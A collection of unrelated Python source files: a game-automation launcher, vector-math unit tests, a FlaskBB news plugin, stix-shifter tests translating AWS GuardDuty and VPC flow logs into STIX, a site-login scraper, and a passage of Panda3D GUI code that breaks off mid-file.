main.py | DuskXi/ArkX | 2 | 5074 | <filename>main.py
import os
import json
from File.file import File
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def fileRead(fileName, encoding='utf-8'):
with open(fileName, encoding=encoding) as f:
return f.read()
def main():
from Automation.distributor import Distributor
from Performance import recoder
from WebInterface import web
modelConfig = json.loads(fileRead("config/model.json"))
labelsName = json.loads(fileRead("config/labelsName.json"))
config = json.loads(fileRead("config/config.json"))
# file = File()
classifyModel = modelConfig["imageClassificationModel"]
# if not file.mergedFile(classifyModel["filePath"], classifyModel["fileName"], classifyModel["files"]):
# print("文件合并失败")
# print("回车退出")
# input()
# exit(0)
recoder.Recoder.debug = False
recoder.Recoder.debugSleepingTime = 60 * 60
recoder.Recoder.initDataSet([modelConfig["objectDetectionModel"]["modelName"], modelConfig["addSanityModel"]["modelName"]],
[classifyModel["modelName"]])
# modelConfig["imageClassificationModel"]["filePath"] = os.path.join(classifyModel["filePath"], classifyModel["fileName"])
distributor = Distributor(modelConfig, config["adb_path"], labelsName)
web.run(distributor, config)
if __name__ == "__main__":
main()
| 2.296875 | 2 |
tests/test_simple.py | cprogrammer1994/miniglm | 4 | 5075 | <reponame>cprogrammer1994/miniglm<filename>tests/test_simple.py<gh_stars>1-10
import struct
import numpy as np
import pytest
import miniglm
def test_add_vec_vec():
res = miniglm.add((1.0, 2.0, 3.0), (1.5, 1.8, 1.2))
np.testing.assert_almost_equal(res, (2.5, 3.8, 4.2))
assert type(res) is tuple
def test_add_vec_scalar():
res = miniglm.add((1.0, 2.0, 3.0), 0.5)
np.testing.assert_almost_equal(res, (1.5, 2.5, 3.5))
assert type(res) is tuple
def test_sub_vec_vec():
res = miniglm.sub((5.0, 6.0, 7.0), (1.5, 1.8, 1.2))
np.testing.assert_almost_equal(res, (3.5, 4.2, 5.8))
assert type(res) is tuple
def test_sub_vec_scalar():
res = miniglm.sub((5.0, 6.0, 7.0), 1.5)
np.testing.assert_almost_equal(res, (3.5, 4.5, 5.5))
assert type(res) is tuple
def test_mul_vec_vec():
res = miniglm.mul((5.0, 6.0, 7.0), (1.5, 1.8, 1.2))
np.testing.assert_almost_equal(res, (7.5, 10.8, 8.4))
assert type(res) is tuple
def test_mul_vec_scalar():
res = miniglm.mul((1.0, 2.0, 3.0), 2.0)
np.testing.assert_almost_equal(res, (2.0, 4.0, 6.0))
assert type(res) is tuple
def test_cross():
res = miniglm.cross((2.0, 3.5, 7.1), (0.2, 10.0, 3.3))
np.testing.assert_almost_equal(res, (-59.45, -5.18, 19.3))
assert type(res) is tuple
def test_dot_vec():
res = miniglm.dot((2.0, 3.5, 7.1), (0.2, 10.0, 3.3))
np.testing.assert_almost_equal(res, 58.83)
def test_dot_quat():
res = miniglm.dot((2.0, 3.5, 7.1), (0.2, 10.0, 3.3))
np.testing.assert_almost_equal(res, 58.83)
def test_mix_vec():
res = miniglm.mix((2.5, 3.4, 4.6), (7.2, 1.1, 3.2), 0.2)
np.testing.assert_almost_equal(res, (3.44, 2.94, 4.32))
assert type(res) is tuple
def test_mix_scalar():
res = miniglm.mix(1.0, 3.0, 0.5)
np.testing.assert_almost_equal(res, 2.0)
def test_rotate():
res = miniglm.rotate(miniglm.pi / 3.0, miniglm.norm((0.48, 0.60, 0.64)))
expected = (0.24, 0.3, 0.32, 0.8660254037844387)
np.testing.assert_almost_equal(res, expected)
assert type(res) is tuple
def test_split_quat():
quat = (0.24, 0.3, 0.32, 0.8660254037844387)
angle, axis = miniglm.split(quat)
np.testing.assert_almost_equal(angle, miniglm.pi / 3.0)
np.testing.assert_almost_equal(axis, (0.48, 0.60, 0.64))
assert type(axis) is tuple
def test_rotate_x_90_deg():
res = miniglm.rotate(miniglm.pi / 2.0, (1.0, 0.0, 0.0))
np.testing.assert_almost_equal(res, (np.sqrt(2.0) / 2.0, 0.0, 0.0, np.sqrt(2.0) / 2.0))
def test_rotate_y_90_deg():
res = miniglm.rotate(miniglm.pi / 2.0, (0.0, 1.0, 0.0))
np.testing.assert_almost_equal(res, (0.0, np.sqrt(2.0) / 2.0, 0.0, np.sqrt(2.0) / 2.0))
def test_rotate_z_90_deg():
res = miniglm.rotate(miniglm.pi / 2.0, (0.0, 0.0, 1.0))
np.testing.assert_almost_equal(res, (0.0, 0.0, np.sqrt(2.0) / 2.0, np.sqrt(2.0) / 2.0))
def test_norm_vec():
res = miniglm.norm((48.0, 60.0, 64.0))
expected = (0.48, 0.60, 0.64)
np.testing.assert_almost_equal(res, expected)
assert type(res) is tuple
def test_norm_quat():
res = miniglm.norm((2.0, 4.0, 8.0, 4.0))
expected = (0.2, 0.4, 0.8, 0.4)
np.testing.assert_almost_equal(res, expected)
assert type(res) is tuple
def test_norm_mat():
mat = (
0.074, 0.962, -0.259,
-0.518, 0.259, 0.814,
0.851, 0.074, 0.518,
)
res = miniglm.norm(mat)
np.testing.assert_almost_equal(miniglm.det(res), 1.0)
np.testing.assert_almost_equal(miniglm.cross(res[0:3], res[3:6]), res[6:9])
np.testing.assert_almost_equal(miniglm.dot(res[0:3], res[3:6]), 0.0)
np.testing.assert_almost_equal(miniglm.dot(res[3:6], res[6:9]), 0.0)
np.testing.assert_almost_equal(miniglm.dot(res[0:3], res[6:9]), 0.0)
assert type(res) is tuple
def test_cast():
quat = (0.2, 0.4, 0.8, 0.4)
mat = (-0.6, 0.8, 0.0, -0.48, -0.36, 0.8, 0.64, 0.48, 0.6)
np.testing.assert_almost_equal(miniglm.cast(quat), mat)
np.testing.assert_almost_equal(miniglm.cast(mat), quat)
np.testing.assert_almost_equal(miniglm.cast(miniglm.cast(quat)), quat)
np.testing.assert_almost_equal(miniglm.cast(miniglm.cast(mat)), mat)
def test_swizzle_vec():
res = miniglm.swizzle((1.0, 2.0, 3.0), 'yxz')
np.testing.assert_almost_equal(res, (2.0, 1.0, 3.0))
def test_swizzle_quat():
res = miniglm.swizzle((0.1, 0.7, 0.5, 0.5), 'wxyz')
np.testing.assert_almost_equal(res, (0.5, 0.1, 0.7, 0.5))
def test_pack_scalar():
assert miniglm.pack(1.75) == struct.pack('f', 1.75)
def test_pack_vec():
vec = (1.0, 2.0, 3.0)
assert miniglm.pack(vec) == struct.pack('fff', *vec)
def test_pack_quat():
quat = (0.1, 0.7, 0.5, 0.5)
assert miniglm.pack(quat) == struct.pack('ffff', *quat)
def test_pack_mat():
mat = (1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0)
assert miniglm.pack(mat) == struct.pack('fffffffff', *mat)
| 2.171875 | 2 |
flaskbb/plugins/news/views.py | konstantin1985/forum | 0 | 5076 | <filename>flaskbb/plugins/news/views.py<gh_stars>0
# -*- coding: utf-8 -*-
from flask import Blueprint, redirect
from flaskbb.utils.helpers import render_template
from .forms import AddForm, DeleteForm
from .models import MyPost
from flaskbb.extensions import db
news = Blueprint("news", __name__, template_folder="templates")
def inject_news_link():
return render_template("navigation_snippet.html")
@news.route("/")
def index():
return render_template("index.html", newsposts = MyPost.query.all())
@news.route('/add', methods=['GET', 'POST'])
def add():
form = AddForm()
if form.validate_on_submit():
p = MyPost(name = form.name.data, text = form.text.data)
db.session.add(p)
db.session.commit()
return redirect('/news')
return render_template('add.html', form=form)
@news.route('/delete', methods=['GET', 'POST'])
def delete():
form = DeleteForm()
if form.validate_on_submit():
p = MyPost.query.filter(MyPost.name == form.name.data).first()
db.session.delete(p)
db.session.commit()
return redirect('/news')
return render_template('delete.html', form=form)
| 2.234375 | 2 |
stix_shifter_modules/aws_athena/tests/stix_translation/test_aws_athena_json_to_stix.py | nkhetia31/stix-shifter | 33 | 5077 | from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator
from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers
from stix_shifter_modules.aws_athena.entry_point import EntryPoint
import unittest
MODULE = "aws_athena"
entry_point = EntryPoint()
map_data = entry_point.get_results_translator().map_data
data_source = {
"type": "identity",
"id": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"name": "aws_athena",
"identity_class": "events"
}
options = {}
class TestAwsResultsToStix(unittest.TestCase):
"""
class to perform unit test case for Aws Athena logs translate results
"""
@staticmethod
def get_first(itr, constraint):
"""
return the obj in the itr if constraint is true
"""
return next(
(obj for obj in itr if constraint(obj)),
None
)
@staticmethod
def get_first_of_type(itr, typ):
"""
to check whether the object belongs to respective stix object
"""
return TestAwsResultsToStix.get_first(itr, lambda o: isinstance(o, dict) and o.get('type') == typ)
def test_common_prop(self):
"""
to test the common stix object properties
"""
data = {
"guardduty": {
"accountid": 979326520502,
"region": "us-east-1",
"type": "UnauthorizedAccess:EC2/SSHBruteForce",
"resource_instancedetails_networkinterfaces_0_privatednsname": "ip-172-31-60-104.ec2.internal",
"resource_instancedetails_networkinterfaces_0_privateipaddress": "172.31.60.104",
"resource_instancedetails_networkinterfaces_0_subnetid": "subnet-ea9d6be4",
"resource_instancedetails_networkinterfaces_0_publicdnsname": "ec2-18-210-22-128.compute-1."
"amazonaws.com",
"resource_instancedetails_networkinterfaces_0_vpcid": "vpc-10db926a",
"resource_instancedetails_networkinterfaces_0_publicip": "172.16.31.10",
"resource_instancedetails_networkinterfaces_0_networkinterfaceid": "eni-0203098cca62c3f21",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupid": "sg-018edb43fcc81525f",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupname": "launch-wizard-13",
"resource_instancedetails_imageid": "ami-0015fcaa5516c75ed",
"resource_instancedetails_instanceid": "i-031cb81e1f32a36e1",
"resource_instancedetails_availabilityzone": "us-east-1f",
"service_eventfirstseen": "2020-07-31T06:19:09Z",
"service_action_networkconnectionaction_protocol": "TCP",
"service_action_networkconnectionaction_remoteportdetails_port": "38420",
"service_action_networkconnectionaction_remoteipdetails_country_countryname": "Sweden",
"service_action_networkconnectionaction_remoteipdetails_ipaddressv4": "172.16.31.10",
"service_action_networkconnectionaction_remoteipdetails_city_cityname": "\u00d6rebro",
"service_action_networkconnectionaction_localportdetails_port": "22",
"service_eventlastseen": "2020-09-12T09:19:40Z",
"severity": 2,
"title": "85.224.242.94 is performing SSH brute force attacks against i-031cb81e1f32a36e1.",
"arn": "arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed494f3b7ca56acdc74df/finding/"
"7ab9d1cb6248e05a0e419a79528761cb",
"createdat": "2020-07-31T06:37:13.745Z",
"description": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1. "
"Brute force attacks are used to gain unauthorized access to your instance by "
"guessing the SSH password.",
"finding_id": "7ab9d1cb6248e05a0e419a79528761cb",
"partition": "aws",
"resource": {
"instancedetails": {
"imagedescription": "Provided by Red Hat, Inc.",
"instancestate": "running",
"instancetype": "t2.large",
"launchtime": "2020-09-11T23:16:03Z",
"tags": {
"0": {
"key": "Name",
"value": "ArcSight Logger"
}
}
},
"resourcetype": "Instance"
},
"schemaversion": 2.0,
"service": {
"action": {
"actiontype": "NETWORK_CONNECTION",
"networkconnectionaction": {
"connectiondirection": "INBOUND",
"localportdetails": {
"portname": "SSH"
},
"remoteipdetails": {
"geolocation": {
"lat": "59.2741",
"lon": "15.2066"
},
"organization": {
"asn": "2119",
"asnorg": "Telenor Norge AS",
"isp": "Telenor Sverige AB",
"org": "Telenor Sverige AB"
}
},
"remoteportdetails": {
"portname": "Unknown"
}
}
},
"count": "20",
"detectorid": "6ab6e6ee780ed494f3b7ca56acdc74df",
"resourcerole": "TARGET",
"servicename": "guardduty"
},
"updatedat": "2020-09-12T09:25:34.086Z"
}
}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
assert result_bundle['type'] == 'bundle'
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
assert result_bundle_identity['id'] == data_source['id']
assert result_bundle_identity['name'] == data_source['name']
assert result_bundle_identity['identity_class'] == data_source['identity_class']
observed_data = result_bundle_objects[1]
assert observed_data['id'] is not None
assert observed_data['type'] == "observed-data"
assert observed_data['created_by_ref'] == result_bundle_identity['id']
assert observed_data['created'] is not None
assert observed_data['modified'] is not None
assert observed_data['number_observed'] is not None
def test_vpc_flow_network_json_to_stix(self):
"""to test network stix object properties"""
data = {
"vpcflow": {
"account": 979326520502,
"interfaceid": "eni-04b762de832716892",
"sourceaddress": "192.168.127.12",
"destinationaddress": "172.31.62.249",
"sourceport": 58387,
"destinationport": 51289,
"protocol": "tcp",
"starttime": 1592547796,
"endtime": 1592547798,
"action": "REJECT",
"date": "2020-06-19",
"logstatus": "OK",
"numbytes": 40,
"region": "us-east-1",
"version": 2
}
}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
network_obj = TestAwsResultsToStix.get_first_of_type(objects.values(), 'network-traffic')
assert network_obj is not None, 'network-traffic object type not found'
assert network_obj.keys() == {'type', 'src_ref', 'dst_ref', 'src_port', 'dst_port', 'protocols', 'start', 'end'}
assert network_obj['type'] == 'network-traffic'
assert network_obj['src_ref'] == '1'
assert network_obj['dst_ref'] == '4'
assert network_obj['src_port'] == 58387
assert network_obj['dst_port'] == 51289
assert network_obj['protocols'] == ['tcp']
assert network_obj['start'] == '2020-06-19T06:23:16.000Z'
assert network_obj['end'] == '2020-06-19T06:23:18.000Z'
def test_vpc_flow_custom_attr_json_to_stix(self):
"""to test network stix object properties"""
data = {
"vpcflow": {
"account": 979326520502,
"interfaceid": "eni-04b762de832716892",
"sourceaddress": "192.168.127.12",
"destinationaddress": "172.31.62.249",
"sourceport": 58387,
"destinationport": 51289,
"protocol": "tcp",
"starttime": 1592547796,
"endtime": 1592547798,
"action": "REJECT",
"date": "2020-06-19",
"logstatus": "OK",
"numbytes": 40,
"region": "us-east-1",
"version": 2
}
}
options = {"unmapped_fallback": True}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
custom_object = TestAwsResultsToStix.get_first_of_type(objects.values(), 'x-aws-athena')
assert custom_object.keys() == {'type', 'interfaceid', 'date', 'logstatus', 'numbytes', 'region', 'version'}
assert custom_object['date'] == '2020-06-19'
assert custom_object['logstatus'] == 'OK'
assert custom_object['numbytes'] == 40
assert custom_object['region'] == 'us-east-1'
assert custom_object['version'] == 2
def test_guardduty_network_json_to_stix(self):
"""to test network stix object properties"""
data = {
"guardduty": {
"accountid": 979326520502,
"region": "us-east-1",
"type": "UnauthorizedAccess:EC2/SSHBruteForce",
"resource_instancedetails_networkinterfaces_0_privatednsname": "ip-172-31-60-104.ec2.internal",
"resource_instancedetails_networkinterfaces_0_privateipaddress": "172.31.60.104",
"resource_instancedetails_networkinterfaces_0_subnetid": "subnet-ea9d6be4",
"resource_instancedetails_networkinterfaces_0_publicdnsname": "ec2-18-210-22-128.compute-1."
"amazonaws.com",
"resource_instancedetails_networkinterfaces_0_vpcid": "vpc-10db926a",
"resource_instancedetails_networkinterfaces_0_publicip": "172.16.31.10",
"resource_instancedetails_networkinterfaces_0_networkinterfaceid": "eni-0203098cca62c3f21",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupid": "sg-018edb43fcc81525f",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupname": "launch-wizard-13",
"resource_instancedetails_imageid": "ami-0015fcaa5516c75ed",
"resource_instancedetails_instanceid": "i-031cb81e1f32a36e1",
"resource_instancedetails_availabilityzone": "us-east-1f",
"service_eventfirstseen": "2020-07-31T06:19:09Z",
"service_action_networkconnectionaction_protocol": "TCP",
"service_action_networkconnectionaction_remoteportdetails_port": "38420",
"service_action_networkconnectionaction_remoteipdetails_country_countryname": "Sweden",
"service_action_networkconnectionaction_remoteipdetails_ipaddressv4": "172.16.31.10",
"service_action_networkconnectionaction_remoteipdetails_city_cityname": "rebro",
"service_action_networkconnectionaction_localportdetails_port": "22",
"service_eventlastseen": "2020-09-12T09:19:40Z",
"severity": 2,
"title": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1.",
"arn": "arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed494f3b7ca56acdc74df/finding"
"/7ab9d1cb6248e05a0e419a79528761cb",
"createdat": "2020-07-31T06:37:13.745Z",
"description": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1. "
"Brute force attacks are used to gain unauthorized access to your instance by "
"guessing the SSH password.",
"finding_id": "7ab9d1cb6248e05a0e419a79528761cb",
"partition": "aws",
"resource": {
"instancedetails": {
"imagedescription": "Provided by Red Hat, Inc.",
"instancestate": "running",
"instancetype": "t2.large",
"launchtime": "2020-09-11T23:16:03Z",
"tags": {
"0": {
"key": "Name",
"value": "<NAME>"
}
}
},
"resourcetype": "Instance"
},
"schemaversion": 2.0,
"service": {
"action": {
"actiontype": "NETWORK_CONNECTION",
"networkconnectionaction": {
"connectiondirection": "INBOUND",
"localportdetails": {
"portname": "SSH"
},
"remoteipdetails": {
"geolocation": {
"lat": "59.2741",
"lon": "15.2066"
},
"organization": {
"asn": "2119",
"asnorg": "Telenor Norge AS",
"isp": "Telenor Sverige AB",
"org": "Telenor Sverige AB"
}
},
"remoteportdetails": {
"portname": "Unknown"
}
}
},
"count": "20",
"detectorid": "6ab6e6ee780ed494f3b7ca56acdc74df",
"resourcerole": "TARGET",
"servicename": "guardduty"
},
"updatedat": "2020-09-12T09:25:34.086Z"
}
}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
network_obj = TestAwsResultsToStix.get_first_of_type(objects.values(), 'network-traffic')
assert network_obj is not None, 'network-traffic object type not found'
assert network_obj.keys() == {'type', 'dst_port', 'src_ref', 'dst_ref', 'src_port', 'protocols'}
assert network_obj['type'] == 'network-traffic'
assert network_obj['dst_port'] == 38420
assert network_obj['src_ref'] == '3'
assert network_obj['dst_ref'] == '9'
assert network_obj['src_port'] == 22
assert network_obj['protocols'] == ['tcp']
def test_guardduty_custom_attr_json_to_stix(self):
"""to test network stix object properties"""
data = {
"guardduty": {
"accountid": 979326520502,
"region": "us-east-1",
"type": "UnauthorizedAccess:EC2/SSHBruteForce",
"resource_instancedetails_networkinterfaces_0_privatednsname": "ip-172-31-60-104.ec2.internal",
"resource_instancedetails_networkinterfaces_0_privateipaddress": "172.31.60.104",
"resource_instancedetails_networkinterfaces_0_subnetid": "subnet-ea9d6be4",
"resource_instancedetails_networkinterfaces_0_publicdnsname": "ec2-18-210-22-128.compute-1."
"amazonaws.com",
"resource_instancedetails_networkinterfaces_0_vpcid": "vpc-10db926a",
"resource_instancedetails_networkinterfaces_0_publicip": "172.16.31.10",
"resource_instancedetails_networkinterfaces_0_networkinterfaceid": "eni-0203098cca62c3f21",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupid": "sg-018edb43fcc81525f",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupname": "launch-wizard-13",
"resource_instancedetails_imageid": "ami-0015fcaa5516c75ed",
"resource_instancedetails_instanceid": "i-031cb81e1f32a36e1",
"resource_instancedetails_availabilityzone": "us-east-1f",
"service_eventfirstseen": "2020-07-31T06:19:09Z",
"service_action_networkconnectionaction_protocol": "TCP",
"service_action_networkconnectionaction_remoteportdetails_port": "38420",
"service_action_networkconnectionaction_remoteipdetails_country_countryname": "Sweden",
"service_action_networkconnectionaction_remoteipdetails_ipaddressv4": "172.16.31.10",
"service_action_networkconnectionaction_remoteipdetails_city_cityname": "rebro",
"service_action_networkconnectionaction_localportdetails_port": "22",
"service_eventlastseen": "2020-09-12T09:19:40Z",
"severity": 2,
"title": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1.",
"arn": "arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed494f3b7ca56acdc74df/finding/"
"7ab9d1cb6248e05a0e419a79528761cb",
"createdat": "2020-07-31T06:37:13.745Z",
"description": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1."
" Brute force attacks are used to gain unauthorized access to your instance by guessing "
"the SSH password.",
"finding_id": "7ab9d1cb6248e05a0e419a79528761cb",
"partition": "aws",
"resource": {
"instancedetails": {
"imagedescription": "Provided by Red Hat, Inc.",
"instancestate": "running",
"instancetype": "t2.large",
"launchtime": "2020-09-11T23:16:03Z",
"tags": {
"0": {
"key": "Name",
"value": "ArcSight Logger"
}
}
},
"resourcetype": "Instance"
},
"schemaversion": 2.0,
"service": {
"action": {
"actiontype": "NETWORK_CONNECTION",
"networkconnectionaction": {
"connectiondirection": "INBOUND",
"localportdetails": {
"portname": "SSH"
},
"remoteipdetails": {
"geolocation": {
"lat": "59.2741",
"lon": "15.2066"
},
"organization": {
"asn": "2119",
"asnorg": "Telenor Norge AS",
"isp": "Telenor Sverige AB",
"org": "Telenor Sverige AB"
}
},
"remoteportdetails": {
"portname": "Unknown"
}
}
},
"count": "20",
"detectorid": "6ab6e6ee780ed494f3b7ca56acdc74df",
"resourcerole": "TARGET",
"servicename": "guardduty"
},
"updatedat": "2020-09-12T09:25:34.086Z"
}
}
options = {"unmapped_fallback": True}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
custom_object = TestAwsResultsToStix.get_first_of_type(objects.values(), 'x-aws-athena')
assert custom_object.keys() == {'type', 'service_action_networkconnectionaction_remoteipdetails_country_countryname',
'finding_id', 'arn', 'createdat', 'partition', 'resource',
'schemaversion', 'service', 'updatedat'}
assert custom_object['arn'] == 'arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed' \
'494f3b7ca56acdc74df/finding/7ab9d1cb6248e05a0e419a79528761cb'
assert custom_object['finding_id'] == '7ab9d1cb6248e05a0e419a79528761cb'
assert custom_object['createdat'] == '2020-07-31T06:37:13.745Z'
assert custom_object['partition'] == 'aws'
assert custom_object['schemaversion'] == 2.0
assert custom_object['updatedat'] == '2020-09-12T09:25:34.086Z'
| 2.1875 | 2 |
Python Spider/xpath/03 login.py | CodingGorit/Coding-with-Python | 1 | 5078 | <filename>Python Spider/xpath/03 login.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
#file: 03 login.py
#@author: Gorit
#@contact: <EMAIL>
#@time: 2020/1/20 12:44
import requests
from lxml import etree
# 封装类,进行学习猿地的登录和订单的获取
class lMonKey():
# 登录请求地址
loginUrl = "https://www.lmonkey.com/login"
# 账户中心地址
orderUrl = "https://www.lmonkey.com/my/order"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3741.400 QQBrowser/10.5.3863.400"
}
# 请求对象
req = None
# token 口令
token = ''
# 订单号
# 初始化的方法
def __init__(self):
# 请求对象的初始化
self.req = requests.session()
if self.getlogin(): # get 登录成功
if self.postlogin(): # post 登录成功
self.getordder()
# get 登录页面,获取 _token
def getlogin(self):
# 1. get 请求 login页面,设置 cookie,获取_token
res = self.req.get(url=self.loginUrl,headers=self.headers)
if res.status_code == 200:
print("get 页面请求成功")
html = etree.HTML(res.text)
self.token = html.xpath("//input[@name='_token']/@value")[0]
#找到 input 标签下的,属性为 name="_token" 的标签,找它的 vcalue 的值,也就是 token 的值
# input[@name='xxx'] 找到指定标签
print("token 获取成功")
return True
else:
print("请求错误")
# post 登录,设置 cookie
def postlogin(self):
uname = input("输入你的手机号:")
passw = input("请输入你的密码:")
data = {
"_token": self.token,
"username": uname,
"password": <PASSWORD>
}
# 发起 post 请求
res = self.req.post(url=self.loginUrl,headers=self.headers,data=data)
if res.status_code==200 or res.status_code==302:
print("登录成功!!")
return True
def getordder(self):
# 获取订单页,使用 get 请求即可,获取默认订单号
# 解析数据即可
res = self.req.get(url=self.orderUrl,headers=self.headers)
if res.status_code == 200:
print("请求订单页页面成功")
html = etree.HTML(res.text)
# 頁面解析
r = html.xpath("//div[@class='avatar-content']/small/text()")
print(r)
else:
print("頁面請求失敗")
obj = lMonKey()
| 2.96875 | 3 |
src/gui/MultiplayerPlayerInfo.py | fireclawthefox/AnkandoraLight | 3 | 5079 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file was created using the DirectGUI Designer
from direct.gui import DirectGuiGlobals as DGG
from direct.gui.DirectFrame import DirectFrame
from direct.gui.DirectLabel import DirectLabel
from direct.gui.DirectButton import DirectButton
from direct.gui.DirectOptionMenu import DirectOptionMenu
from panda3d.core import (
LPoint3f,
LVecBase3f,
LVecBase4f,
TextNode
)
class GUI:
def __init__(self, rootParent=None):
self.frmMain = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-1.777778, 1.77777778, -1.1638, 1.1638),
hpr=LVecBase3f(0, 0, 0),
image='assets/menu/Background.png',
pos=LPoint3f(0, 0, 0),
image_scale=LVecBase3f(1.77778, 1, 1.1638),
image_pos=LPoint3f(0, 0, 0),
parent=rootParent,
)
self.frmMain.setTransparency(0)
self.frmSinglePlayerCreateGame = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.65, 0.65, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.425, 0, 0),
relief=5,
parent=self.frmMain,
)
self.frmSinglePlayerCreateGame.setTransparency(0)
self.pg703 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.425),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg703.setTransparency(0)
self.pg13803 = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.35, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Start',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_start"],
)
self.pg13803.setTransparency(0)
self.pg5219 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.6, 0, 0.02),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Class',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg5219.setTransparency(0)
self.optionPlayerClass = DirectOptionMenu(
items=['item1'],
frameSize=(0.07500000298023224, 3.012500149011612, -0.11250001192092896, 0.75),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.2, 0, 0.005),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='item1',
cancelframe_frameSize=(-1, 1, -1, 1),
cancelframe_hpr=LVecBase3f(0, 0, 0),
cancelframe_pos=LPoint3f(0, 0, 0),
cancelframe_relief=None,
item_frameSize=(0.07500000298023224, 2.4125001430511475, -0.11250001192092896, 0.75),
item_hpr=LVecBase3f(0, 0, 0),
item_pos=LPoint3f(-0.075, 0, -0.75),
item_text='item1',
item0_text_align=TextNode.A_left,
item0_text_scale=(1, 1),
item0_text_pos=(0, 0),
item0_text_fg=LVecBase4f(0, 0, 0, 1),
item0_text_bg=LVecBase4f(0, 0, 0, 0),
item0_text_wordwrap=None,
popupMarker_frameSize=(-0.5, 0.5, -0.2, 0.2),
popupMarker_hpr=LVecBase3f(0, 0, 0),
popupMarker_pos=LPoint3f(2.7125, 0, 0.31875),
popupMarker_relief=2,
popupMarker_scale=LVecBase3f(0.4, 0.4, 0.4),
popupMenu_frameSize=(0, 2.3375001400709152, -0.862500011920929, 0),
popupMenu_hpr=LVecBase3f(0, 0, 0),
popupMenu_pos=LPoint3f(0, 0, 0),
popupMenu_relief='raised',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.optionPlayerClass.setTransparency(0)
self.btnCancel = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.325, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Cancel',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_cancel"],
)
